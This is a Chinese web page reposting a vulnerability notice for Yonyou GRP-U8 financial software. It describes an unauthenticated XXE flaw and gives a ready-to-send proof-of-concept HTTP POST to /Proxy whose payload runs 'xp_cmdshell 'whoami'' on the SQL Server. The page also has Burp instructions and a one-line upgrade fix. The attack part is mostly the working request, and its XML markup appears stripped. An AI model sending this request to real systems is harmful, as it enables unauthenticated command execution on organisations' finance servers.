用友GRP |
您所在的位置:网站首页 › 用友grp-u8 › 用友GRP |
0x00 漏洞描述 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件。 0x01 漏洞利用条件无需登录 0x02 漏洞复现POC: POST /Proxy HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;) Host: localhost Content-Length: 341 Connection: Keep-Alive Cache-Control: no-cache cVer=9.8.0&dp=XMLAS_DataRequestProviderNameDataSetProviderDataDataexec xp_cmdshell 'whoami'burp抓包,修改url为/Proxy,在body中添加payload ![]() 升级最新版本 |
今日新闻 |
推荐新闻 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |